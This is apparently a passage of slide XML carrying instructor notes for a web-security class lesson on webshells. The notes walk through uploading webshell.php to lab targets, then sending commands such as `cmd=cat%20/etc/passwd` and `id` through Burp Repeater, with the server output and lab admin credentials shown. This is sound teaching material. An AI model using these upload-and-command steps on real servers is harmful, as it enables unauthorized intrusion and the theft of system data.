            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this allows attackers to upload malicious PHP that can be used to execute shell commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that the tool used to do this is called a **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>**, which you'll discuss next.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Take a moment to address remaining questions before proceeding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>#### </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>Webshells</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> allow attackers to run shell commands by sending them as parameters in HTTP requests. The script on the server parses the parameters, then runs them as code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    - In other words, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> is simply a script on the web server that you can use to run shell commands with HTTP requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- For example, to use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, an attacker might navigate to: `http://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshell.php?command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=ls`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - The script would read the `command` parameter, whose value is `ls`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - The script would run `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>ls`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> as a shell command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - The HTTP response would contain the results normally printed to the command line.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that attackers can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> to exfiltrate data and further exploit the vulnerable system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> are typically installed on web servers via file upload features, such as that available on the site you compromised via SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>#### Uploading a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Next, you'll demonstrate how to exploit a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> on a compromised host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Start by showing students [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>](Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>Stu_My_First_Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this script reads the GET query parameter called `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`, and runs it as a shell command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Students will have an opportunity to study this script in more detail in the next exercise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that you can use this to exploit a site by uploading it to a vulnerable site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Return to: &lt;http://ptl-f99df351-3bdd4c8f.libcurl.so/admin/index.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Note**: If necessary, log in with the username `admin` and password `P4ssw0rd`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Click **Add a new picture**, and upload [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>](Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>Stu_My_First_Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Click the link to `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`. In the navigate bar, add the query string: `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=cat%20/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/passwd`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Your URL will look something like: `http://ptl-f99df351-3bdd4c8f.libcurl.so/admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>index.php?cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=cat%20/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/passwd`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Show that this dumps the contents of the server's `/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/passwd` file to the page, demonstrating that it ran the command `cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/passwd` sent in the query parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Take a moment to address remaining questions before proceeding.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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44395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Stu_My_First_Webshell</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98357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the solutions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/Stu_My_First_Webshell/Solved/README.md </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(duplicated below).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#### </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Open [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>](Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Stu_My_First_Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) in a text editor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - PHP files start with `&lt;?php` and end with `?&gt;`, with code contained between these tokens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - PHP code has direct access to HTTP request data. You can access query parameters by using `$_GET`, and POST body parameters by using `$_POST`. Again, students won't need to write PHP themselves, but will need to be able to modify payloads that use these variables in their later work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - You can retrieve query parameters with, e.g.: `$_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>name_of_parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>']`. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - You can retrieve POST data with, e.g.: `$_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>name_of_parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>']`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#### Repeater Review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Navigate to the appropriate URL at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- **Mac**: `http://localhost/vulnerabilities/upload/`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- **Windows**: `http://192.168.99.100/vulnerabilities/upload/`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Upload `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`. Then, navigate to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - **Mac**: `http://localhost/hackable/webshell.php`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - **Windows**: `http://192.168.99.100/hackable/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that this page is blank because it displays the _result_ of running a command on the shell. Since you haven't sent one yet, the page is blank.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- In the URL bar, add a query parameter, so the URL ends with: `/hackable/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell.php?cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=ls`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that this prints what looks to be a file listing to the page. **Success!**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Launch Burp Suite, and intercept a request to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Send the request to Repeater by pressing `Ctrl + R`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- In Repeater, point out that you can change the command you send by simply updating the request line. This makes use of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> straightforward.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ![](Images/webshell_repeater.png)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Change the command from `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to `id`, and press **Go**.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that this produces the result below in the **Response** pane.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Date: Fri, 28 Dec 2018 19:47:47 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Server: Apache/2.4.25 (Debian)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Vary: Accept-Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Content-Length: 107</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Content-Type: text/html; charset=UTF-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=33(www-data) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=33(www-data) groups=33(www-data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=33(www-data) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=33(www-data) groups=33(www-data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Change the command to: `cat%20/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Remind students that `%20` means "space", since whitespace must be encoded to be sent in URLs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Point out that this produces the results below—in other words, it dumps a list of every user on the system:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Date: Fri, 28 Dec 2018 19:49:45 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Server: Apache/2.4.25 (Debian)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Vary: Accept-Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Content-Length: 1030</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Content-Type: text/html; charset=UTF-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  root:x:0:0:root:/root:/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  daemon:x:1:1:daemon:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  bin:x:2:2:bin:/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  sys:x:3:3:sys:/dev:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  sync:x:4:65534:sync:/bin:/bin/sync</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  games:x:5:60:games:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/games:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
